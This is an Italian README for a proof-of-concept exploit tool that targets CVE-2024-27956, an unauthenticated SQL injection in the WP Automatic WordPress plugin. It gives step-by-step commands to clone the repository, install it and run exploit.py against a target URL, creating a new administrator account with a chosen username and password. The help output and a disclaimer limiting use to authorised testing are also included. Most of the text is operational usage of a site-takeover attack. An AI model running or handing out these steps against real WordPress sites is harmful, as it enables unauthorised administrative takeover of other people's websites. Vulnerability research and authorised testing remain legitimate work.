
CVE-2024-27956 - Tool di Exploit SQL Injection per WP Automatic
Un exploit proof-of-concept per la vulnerabilità di SQL injection nel plugin WP Automatic (CVE-2024-27956) che colpisce i siti WordPress.
Questo exploit prende di mira una vulnerabilità critica di SQL injection non autenticata nel plugin WP Automatic (versioni < 3.9.2.0) per WordPress. La vulnerabilità consente agli attaccanti di creare utenti amministrativi e ottenere il pieno controllo dei siti web vulnerabili.
git clone https://github.com/devsec23/CVE-2024-27956.git
cd CVE-2024-27956
pip install -r requirements.txt
python3 exploit.py http://vulnerable-site.com
python3 exploit.py http://vulnerable-site.com -u admin -p P@ssw0rd123
python3 exploit.py http://vulnerable-site.com --proxy http://127.0.0.1:8080
positional arguments:
url Target WordPress URL
optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
Username for the new admin account
-p PASSWORD, --password PASSWORD
Password for the new admin account
Questo strumento è fornito esclusivamente per scopi didattici e di penetration testing autorizzato. Lo sviluppatore non è responsabile per qualsiasi uso improprio di questo software. Ottenere sempre la dovuta autorizzazione prima di testare qualsiasi sistema.
Questo progetto è concesso in licenza sotto la MIT License - consultare il file LICENSE per i dettagli.